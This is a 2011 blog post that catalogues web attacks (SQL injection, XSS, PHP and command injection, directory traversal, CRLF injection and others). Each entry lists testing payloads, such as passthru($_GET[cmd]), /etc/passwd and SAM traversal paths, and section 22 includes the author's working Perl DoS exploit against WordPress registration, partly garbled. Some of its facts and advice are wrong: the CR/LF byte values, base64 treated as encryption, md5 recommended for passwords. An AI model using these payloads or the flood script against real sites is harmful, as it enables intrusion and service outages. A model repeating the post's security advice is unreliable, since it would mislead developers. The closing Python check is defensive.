Monday, June 13, 2011

Most of Web Attacks

I will be explaining most web attacks here, so just pay attention.

1.) SQL injection

a) Description: SQL injection allows an attacker to execute SQL commands on the server that he is attacking.

b) Impact: An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

c) Recommendation: Allow only a-zA-Z0-9 characters.

d) Testing string/s: ('), (/), (\), (#), ("), (--), (-), (*)

e) Response: 200 OK, database error messages, redirection to another page

2.) Cross Site Scripting (XSS)

a) Description: Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context, allowing the attacker to access any cookies or session tokens retained by the browser. It is abbreviated XSS because CSS already means "Cascading Style Sheets".

b) Impact: Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
c) Recommendation: Allow only a-zA-Z0-9 characters, or use the htmlspecialchars() function in PHP.

d) Testing string/s: (), ([script]alert();[/script]), (), ()

e) Response: 200 OK, a pop-up message with your cookies

3.) Cross site request forgery (CSRF)

a) Description: Cross-Site Request Forgeries (CSRF) are an almost opposite style of attack. Rather than exploiting the trust that a user has for a Web site, they exploit the trust that a Web site has for a user. In the case of the XSS attacks we just discussed, the user is the victim. In the case of CSRF, the user is an unknowing accomplice.

b) Impact: An attacker may put a link on a forum, and when someone clicks the link he will send a message to the forum server. This may cause a flood.

c) Recommendation:
- Use POST instead of GET method
- Request authorization
- Check the Referer
- Every request has to be unique

d) Testing string/s:
Subject: Message:
This way the attacker will flood the server, and he could bypass firewall protection since the flooders would be people who don't know what they are doing.

e) Response: 200 OK, successful redirection

4.) PHP injection

a) Description: PHP code injection is a vulnerability that allows an attacker to inject custom code into the server-side scripting engine. This vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. Eval will execute the argument as code.

b) Impact: Malicious users may inject PHP code which will be executed on the server side. It's possible to run system commands if the PHP interpreter allows system() or similar functions.

c) Recommendation: Allow only a-zA-Z0-9 characters and set php.ini as follows:

    engine = off
    register_globals = off
    magic_quotes_gpc = off
    magic_quotes_runtime = Off
    magic_quotes_sybase = Off
    session.use_trans_sid = off
    session.use_only_cookies = 1
    safe_mode = on
    safe_mode_gid = Off
    safe_mode_include_dir = Off
    safe_mode_exec_dir = Off
    allow_url_fopen = off
    open_basedir = '/home/sheib/public_html/unsafe' ; edit this
    file_uploads = off
    display_errors = off
    log_errors = on
    expose_php = off
    error_reporting = E_ALL
    session.save_path = "/tmp" ; edit this if you want
    post_max_size = 8M
    disable_functions = exec, passthru, proc_open, shell_exec, system, popen, pcntl_fork, pcntl_exec, fsockopen, pfsockopen, socket_bind, socket_accept, socket_listen, socket_create, stream_socket_client, stream_socket_server, dl, glob, posix, include, include_once, require, require_once, fopen, readfile, file, imagecreatefromXXX, phpinfo, eval, chroot, suexec

Limits:
* addslashes/stripslashes/magic_quotes_gpc won't help much
* When sending data use $_GET/$_POST, and for authentication use $_SESSION, instead of register_globals
* Don't count on encryption functions like urlencode or base64_encode; use md5 hashing

d) Testing string/s: (), (system(base64_decode(YWRtaW4=) #admin),
('.passthru($_GET[cmd]).'&cmd=id), (phpinfo()

e) Response: 200 OK, test, admin, uid...

5.) PERL injection

a) Description: Perl injection is the same as PHP injection; the difference is that you inject Perl code, not PHP.

b) Impact: Malicious users may inject Perl code which will be executed on the server side.

c) Recommendation: Allow only a-zA-Z0-9 characters and use no warnings;

d) Testing string/s: (perl -e system(ipconfig)), (perl -e exec(ipconfig)), (perl -e \'print 'foo'\)

e) Response: 200 OK, Windows IP Configuration, foo

6.) Path disclosure

a) Description: The response contains an error message that discloses the installation path and other data.

b) Impact: A remote user can determine the full path to the web root directory and other potentially sensitive information.

c) Recommendation: Allow only a-zA-Z0-9 characters and turn off error messages, depending on the script.

d) References:
-> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm

e) Testing string/s: (/), (\)

f) Response: 200 OK, Warning message

7.) ASP injection

a) Description: ASP injection is the same as PHP or Perl injection; the difference is that you inject ASP code, not PHP/Perl. *Note* ASP injection is possible only on Windows machines running IIS.

b) Impact: Malicious users may inject ASP code which will be executed on the server side.

c) Recommendation: Allow only a-zA-Z0-9 characters and disable the following functions: sp_makewebtask, xp_startmail, xp_sendmail, xp_cmdshell, xp_regwrite

d) Testing string/s: (<%@ LANGUAGE = 'JScript' %> <% Response.Write('Test'); %>;)

e) Response: 200 OK, Test

8.) Source code disclosure

a) Description: It is possible to read the source code of a script by using the script filename as a parameter. It seems that the script includes a file whose name is determined using user-supplied data. This data is not properly validated before being passed to the include function.
b) Impact: An attacker can gather sensitive information (database connection strings, application logic) by analysing the source code. This information can be used to launch further attacks.

c) Recommendation: Analyse the source code of this script and solve the problem.

d) References:
-> "Source Code Disclosure" by Imperva

e) Testing string/s: request the file itself

f) Response: 200 OK

8.) Server side includes (SSI)

a) Description: Server Side Includes or SSI is an easy server-side scripting language used almost exclusively for the web. As its name implies, its primary use is including the contents of a file into another, via a Web server. SSI is primarily used to "paste" the contents of one or more files into another. For example, a file (of any type, .htm, .txt, etc.) containing a daily quote could be included into multiple SSI-enabled pages throughout a website, by placing the following code into the desired pages. With one change of the quote.txt file, pages including the snippet will display the latest daily quote. Server Side Includes are useful for including a common piece of code throughout a site, such as a navigation menu. In order for a web server to recognise an SSI-enabled HTML file and therefore carry out these instructions, the file must end with the .shtml extension. SSI files can also end with .shtm, but this depends on the server's ability to recognise the extension.

b) Impact: An attacker can execute commands on the server.

c) Recommendation: Turn off SSI.

d) References:
-> "Server Side Includes" by Wikipedia

e) Testing string/s:

f) Response: 200 OK, root, uid....

9.) Code execution

a) Description: Code execution vulnerabilities occur where the output or content served from a Web application can be manipulated in such a way that it triggers server-side code execution.
In some poorly written Web applications that allow users to modify server-side files (such as by posting to a message board or guestbook) it is sometimes possible to inject code in the scripting language of the application itself.

b) Impact: A malicious user may execute arbitrary system commands with the permissions of the web server.

c) Recommendation:
* Allow only a-zA-Z0-9 characters
* Turn on safe_mode
* Disable exec, passthru, proc_open, shell_exec, system, popen, pcntl_fork, pcntl_exec
* Set permissions so that only root can execute commands
* Use escapeshellcmd or escapeshellarg

d) References:
-> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm
-> "PHP Top 5" by Owasp

e) Testing string/s: (|id|), ($(id)), (; id), (| id), (&& id) (|| id), (> id), (<>

f) Response: 200 OK, uid...

10.) File inclusion

a) Description: An attacker could include a remote or local file and execute commands on the server.

b) Impact: It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the web server.

c) Recommendation:
* allow_url_fopen = off
* Use the file_exists() function to check that the file is valid
* Disable user control

d) References:
-> "Using remote files"
-> "Code Injection Vulnerabilities Explained" by The Server Pages
-> "PHP Top 5" by Owasp

e) Testing string/s:

f) Response: 200 OK, uid....

11.) Directory Traversal

a) Description: Directory traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

b) Impact: By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server.
c) Recommendation:
* Allow only a-zA-Z0-9 characters
* Set open_basedir
* Set display_errors to off

d) References:
-> "Directory Traversal Attacks" by Acunetix
-> "Security and Safe Mode"
-> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm
-> "Directory traversal" by Wikipedia
-> "Directory Traversal" by Imperva
-> "phpBB Attachment Mod Directory Traversal HTTP POST Injection" by Paul Laudanski

e) Testing string/s: (../) (../../../../../../../../etc/passwd)

f) Response: 200 OK, directory listing, root

12.) Cross Frame scripting (XFS)

a) Description: This is an attack technique used to trick a user into thinking that fake web site content is legitimate data.

b) Impact: Malicious users may poison a frame, allowing them to conduct phishing attacks.

c) Recommendation: Allow only a-zA-Z0-9 characters and verify the data sent by the user.

d) References:
-> "The Phishing Guide" by Gunter Ollmann

e) Testing string/s:

f) Response:

13.) CGI security checks

a) Description: CGI security checks are used to see if the Common Gateway Interface of a site is vulnerable to old/new bugs.

b) Impact: Malicious users may execute commands or do something else, depending on the bug.

c) Recommendation: Keep your server and software updated.

d) References:
-> "CGI script security" by Lincoln D. Stein and John N. Stewart
-> "Safe CGI Programming" by Paul Phillips
-> "CGI security holes" by Jennifer Myers

e) Testing string/s:
/.%252e/.%252e/.%252e/winnt/repair/sam._
/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._

f) Response: 200 OK

14.) Cookie attacks

a) Description: By injecting a custom HTTP header or by injecting a META tag it is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.

b) Impact: By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards.

c) Recommendation: You need to filter the output in order to prevent the injection of custom HTTP headers or META tags. Additionally, with each login the application should provide a new session ID to the user.
d) References:
-> "Session Fixation Vulnerability In Web-based Applications" by Mitja Kolsek
-> "Session Fixation" by Web Application Security Consortium
-> "Session Handling Functions"
-> "Hacking Web Applications Using Cookie Poisoning" by Amit Klein
-> "Penetration Testing for Web Applications (Part Three)" by Jody Melbourne and David Jorm

e) Testing string/s: (Set-Cookie: cookiename=cookievalue) ()

f) Response: 200 OK, new cookie that contains your data

15.) HTTP response splitting/CRLF injection

a) Description: HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters, it is possible to alter the HTTP headers structure. HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.

b) Impact: It is possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies, spoof mail headers or execute HTML code. This may lead to vulnerabilities like XSS (cross-site scripting) or session fixation.

c) Recommendation: You need to restrict CR(0x13)(\r) and LF(0x10)(\n) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers.
d) References:
-> "CRLF Injection Attack" by Acunetix
-> "CRLF Injection" by Ulf Harnhammar
-> "HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" by Amit Klein
-> "Introduction to HTTP Response Splitting" by dcrab
-> "Header Based Exploitation: Web Statistical Software Threats" by Cgisecurity
-> "TCP Port 80 - HyperText Transfer Protocol (HTTP) Header Exploitation" by William Bellamy Jr.

e) Testing string/s: Where our headers will look like:
    CC: [email protected]
    Bcc: [email protected]
And if we change our URL to , mail2, mail3\r\n&subject=foo&message=moofoo
And we just did a mail spoofing attack.

f) Response: 200 OK, changed headers, redirection to another page

16.) Buffer overflow

a) Description: It is almost impossible to find a buffer overflow in a web application today, but there are still some scripts that use C\C++\C# code in them.

b) Impact: An attacker could execute commands on the server and even get root privileges.

c) Recommendation: Analyse the source code of your C\C++\C# program and fix all possible overflows.
* For Microsoft Visual C++ .NET you can use /GS (Buffer Security Check) when compiling to see if there are any possible overflows and /Gs (Control Stack Checking Calls), but be careful when using /Gs

d) References:
-> "Myth-Busting Web Application Buffer Overflows" by Jeremiah Grossman
-> "Buffer overflow" by Wikipedia

e) Testing string/s: 5000 A's

f) Response: 500 Internal Server Error, 0x41414141 or something similar

17.) Format String

a) Description: Format string attacks are a new class of vulnerabilities discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful code. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that perform formatting, such as printf().

b) Impact: A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory.
One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of bytes formatted to the same argument to printf(), assuming that the corresponding argument exists and is of type int *.

c) Recommendation: Analyse the source code of your C\C++\C# program and fix all possible overflows.

d) References:
-> "Format String Attack" by Web Application Security Consortium
-> "Format string attack" by Wikipedia

e) Testing string/s: (%f), (%p), (%n)

f) Response: Error message, something like 0x0804960c and so on...

18.) Integer Overflow

a) Description: In computer programming, an integer overflow is an anomalous condition which may cause a buffer overflow, resulting in a computer security risk where adjacent, valid program control data may be overwritten, permitting the execution of arbitrary, and potentially harmful, code.

b) Impact: A malicious user may create a buffer overflow condition and execute commands on the server.

c) Recommendation: Analyse the source code of your C\C++\C# program and fix all possible overflows.

d) References:
-> "Basic Integer Overflows" by blexim
-> "Integer overflow" by Wikipedia

e) Testing string/s: 65535

f) Response: Error message, something like 0x0000ffff and so on...

19.) LDAP Injection

a) Description: Lightweight Directory Access Protocol (LDAP) is an open-standard protocol for both querying and manipulating X.500 directory services. When a web application fails to properly sanitize user-supplied input, it is possible for an attacker to alter the construction of an LDAP statement.

b) Impact: When an attacker is able to modify an LDAP statement, the process will run with the same permissions as the component that executed the command (e.g. database server, Web application server, Web server, etc.). This can cause serious security problems where the permissions grant the rights to query, modify or remove anything inside the LDAP tree.
c) Recommendation: Allow only a-zA-Z0-9 characters.

d) References:
-> "Lightweight Directory Access Protocol" by Wikipedia
-> "LDAP Injection" by Web Application Security Consortium
-> "LDAP Injection" by Sacha Faust
-> "A String Representation of LDAP Search Filters" by Tim Howes
-> LDAP resources

e) Testing string/s: ()), (*)

f) Response: Redirection, error message containing information

20.) XPath Injection

a) Description: This script is possibly vulnerable to XPath Injection attacks. XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.

b) Impact: An unauthenticated attacker may extract a complete XML document using XPath querying. This may compromise the integrity of your database and expose sensitive information.

c) Recommendation: Allow only a-zA-Z0-9 characters.

d) References:
-> "XPath injection in XML databases" by Runa Dwibedi
-> "XPath Injection" by Web Application Security Consortium
-> "XML Path Language (XPath)" by W3C
-> "Encoding a Taxonomy of Web Attacks with Different-Length Vectors" by Gonzalo Alvarez and Slobodan Petrovic
-> "Blind Xpath Injection" by Amit Klein

e) Testing string/s: ('), (/), (\), (#), ("), (--), (-), (*)

f) Response: Full content of XML document

21.) URL redirection

a) Description: This script is possibly vulnerable to URL redirection attacks. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting.

b) Impact: A remote attacker can redirect users from your website to a specified URL. This problem may help an attacker conduct phishing attacks, distribute trojans, or assist spammers.

c) Recommendation: Your script should properly sanitize user input.
d) References:
-> "Google can be Exploited to Assist Phishing Attacks" by NIST IT SECURITY

e) Testing string/s: ('), (/), (\), (#), ("), (--), (-), (*)

f) Response: 200 OK, redirection to another page

22.) Web Application DoS

a) Description: Web application DoS (Denial of Service) is an attack that sends multiple requests with a very large size to a server.

b) Impact: Computer crash, service crash, SQL crash

c) Recommendation: Preventing DoS, and not only on web applications, isn't that hard, but protecting against DDoS (Distributed Denial of Service) is impossible. Anyway, here are some tips:
* Use POST instead of GET
* Make a function that will stop multiple POST/GET requests to your site from the same user. If the user makes a request 3-4 times, then stop his IP from requesting anything on your site for 5-10 minutes and log his IP
* POST requests should not be longer than 8 MB
* When specifying a maxsize value be sure to make a check function so that the attacker can't make it longer than it is

d) References:
-> "Denial-of-service attack" by Wikipedia
-> "Denial of Service Attacks" by CERT
-> "Application Denial of Service (DOS) Attacks" by Stephen de Vries
-> "Attacking DDoS at the Source" by Jelena Mirkovic, Gregory Prier and Peter Reiher

e) Testing string/s: Here is my wordpress crash exploit:

    #!perl
    #Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev
    #The exploit was tested on 10 machines but not all got flooded. Only 6/10 got crashed
    use Socket;
    if (@ARGV <> $rand=rand(10);
    $host = $ARGV[0];
    $dir = $ARGV[1];
    smile.gif {
    $user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
    $data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
    $len = length $data;
    $foo = "POST ".$dir."wp-register.php HTTP/1.1\r\n".
    "Accept: *\r\n".
    "Accept-Language: en-gb\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Accept-Encoding: gzip, deflate\r\n".
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
    "Host: $host\r\n".
    "Content-Length: $len\r\n".
    "Connection: Keep-Alive\r\n".
    "Cache-Control: no-cache\r\n\r\n".
    "$data";
    my $port = "80";
    my $proto = getprotobyname('tcp');
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
    connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
    send(SOCKET,"$foo", 0);
    syswrite STDOUT, "+";
    }
    #s33 if the server is down
    print "\n\n";
    system('ping $host');
    sub usage {
    print "\n\t(W)ordpress 2.0.1 emote (D)oS (E)xploit (cool.gify matrix_killer\n";
    print "\te-mail: matrix_k\@abv.bg\n";
    print "\tusage: \n";
    print "\t$0 \n";
    print "\tex: $0 127.0.0.1 /woredpress/\n";
    print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
    exit();
    };
    #Wordpress answer:
    #A) DOS shouldn't be handled by a PHP application, there are much more efficient and better ways to deal with this.
    #B) Registration is off by default, so the severity of this sort of DOS is rather low.
    #Well I like giving my own patches or security solutions when I find a bug but this time I agree with the wordpress developers

f) Response: Server crash, service crash, almost impossible to move your mouse

23.) Hidden field manipulation

a) Description: Hidden fields are used for sending a unique value to the server that cannot be edited by the user. But if the user decides to view the HTML source, he will see the hidden field and could change it.

b) Impact: A remote attacker can change the values of different products (if we are talking about a shop or something similar) or cause a server crash.

c) Recommendation: Make a function that will not accept any value other than the one in the hidden field.

d) References:
-> "Penetration Testing for Web Applications (Part One)" by Jody Melbourne and David Jorm

e) Testing string/s: The attacker sees this and saves the HTML on his hard drive. From then on he just changes the value of 7.10 to, let's say, 2.

f) Response: 200 OK, acceptance of the value by the server

24.) Authentication attacks

a) Description: Authentication plays a very important role in security. We use it to identify someone by a special value, cookie, session or something like that.

b) Impact: If an attacker brute-forces or somehow gets the unique identification value of the person he wants, then he could authenticate as him.

c) Recommendation:
* Use SSL on your sites
* When a user logs in, his cookie or whatever it is has to be unique and used only once. That means that when he logs out the cookie has to be destroyed, and the next time a new one should be created
* Authentication keys should be long and encrypted. Use base64 encryption or md5 hashing
* It would be good to have an IP log function
* Authorization should be required to prevent spoofing/hijacking attacks

d) References:
-> "Authentication Hacking Attacks" by Acunetix
-> "Spoofing papers" by Internet Security Systems
-> "Spoofing attack" by Wikipedia
-> "Web Spoofing" by Department of Computer Science
-> "Hijacking" by Wikipedia

e) Testing string/s: And if there is an id 4256467 you will be logged in

f) Response: 200 OK, successful authentication

25.) Authorization attacks

a) Description: While authentication requires a unique value, authorization requests a username/password value.

b) Impact: If an attacker has the username/password value he can log in as the user.

c) Recommendation:
* Passwords should be long and complex: at least 14 characters long, containing at least 5-6 special symbols from the keyboard
* Log IPs that make 6 unsuccessful login tries and ban them for 5-10 minutes
* Use md5 hashing
* Use SSL

d) References:
-> "Authentication Hacking Attacks" by Acunetix

e) Testing string/s: From then on the attacker only tries different username and password combinations to log in

f) Response: 200 OK, acceptance of the username and password by the server

26.) Web pilfering/crawling

a) Description: This attack is used to search a whole site or parts of it for password files, hidden fields and other sensitive information.

b) Impact: An attacker could get a lot of information about a site, and even passwords.

c) Recommendation:
* Don't hide sensitive data in HTML
* Check your logs for multiple GET requests

d) References:
-> "Web crawler" by Wikipedia
-> "Distributed web crawling" by Wikipedia

e) Testing string/s: GET /the_html_document.htlm .....
f) Response: 200 OK, hidden info

27.) Domain Hijacking

a) Description: This attack is used to take over domain names.

b) Impact: An attacker could steal a domain name and from then on he could use it for phishing scams.

c) Recommendation: See the links below.

d) References:
-> "Domain Hijacking: A step-by-step guide" by CCpower
-> "Domain hijacking" by Wikipedia

e) Testing string/s:

f) Response: Changed domain settings

28.) Google

a) Description: Google attacks are based on already found attacks.

b) Impact: It depends on the hole.

c) Recommendation: Remove all pages identified by Google hacking queries.

d) References:
-> Google Hacking Database (GHDB)
-> "Google hacking" by Acunetix

e) Testing string/s: inurl:passwd.txt site:yoursite.com

f) Response: 200 OK

Final words: As you can see, in almost all of the attacks the best solution is to allow only a-zA-Z0-9 characters. Well, there are other types of protection methods too, but they could be bypassed. As an example, addslashes could be bypassed with %2527. If you are worrying about how much time it will cost you to scan your site for all these attacks, then you could use some of the following scanners:

Greets: Bl0od3r, EcLiPsE, Acid_BDS, Alpha-fan and everyone from h4cky0u.org
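
The final words' point that addslashes can be bypassed with %2527, worked through as an added example (not code from the original post). The decode, filter, decode order in `flawed_pipeline` is an assumed model of the vulnerable application, and all function names are hypothetical; the hardened path decodes to a stable form first and applies the a-zA-Z0-9 allow-list to that.

```python
import re
from urllib.parse import unquote

ALLOWED = re.compile(r"[A-Za-z0-9]+")  # the post's a-zA-Z0-9 allow-list
MAX_ROUNDS = 5                          # assumed cap on nested encodings


def addslashes_like(value):
    # Stand-in for the quote/backslash part of PHP addslashes():
    # put a backslash in front of ', " and \.
    return "".join("\\" + ch if ch in "'\"\\" else ch for ch in value)


def flawed_pipeline(wire_value):
    """Assumed vulnerable order: server decodes, filter runs, app decodes again."""
    once = unquote(wire_value)        # web server decodes the request once
    escaped = addslashes_like(once)   # for %2527 the filter sees "%27": no quote yet
    return unquote(escaped)           # extra decode in the app produces a bare quote


def canonicalize(wire_value):
    """Decode until the value stops changing; return (value, rounds needed)."""
    current, rounds = wire_value, 0
    while True:
        decoded = unquote(current)
        if decoded == current:
            return current, rounds
        rounds += 1
        if rounds > MAX_ROUNDS:
            raise ValueError("encoding nested too deeply")
        current = decoded


def check(wire_value):
    """Validate the canonical form, never an intermediate one."""
    try:
        value, rounds = canonicalize(wire_value)
    except ValueError:
        return "reject: nested too deeply"
    if rounds > 1:
        # One layer is normal URL encoding; a second layer is how
        # %2527 and %252f hide a quote or a slash from a filter.
        return "reject: double-encoded"
    if not ALLOWED.fullmatch(value):
        return "reject: disallowed characters"
    return "ok"


# Constructed sample inputs; the traversal path is one of the post's own
# testing strings from section 13.
SAMPLES = [
    "user42",
    "%27",
    "%2527",
    "/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam",
]


def triage(samples=SAMPLES):
    """Map each sample to its verdict, e.g. for reviewing logged parameters."""
    return {sample: check(sample) for sample in samples}


if __name__ == "__main__":
    print(repr(flawed_pipeline("%27")), repr(flawed_pipeline("%2527")))
    for sample, verdict in triage().items():
        print(f"{verdict:32} {sample}")
```

Run the canonical check before any escaping or query building, and log the double-encoded rejections, since ordinary clients rarely send a second encoding layer.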
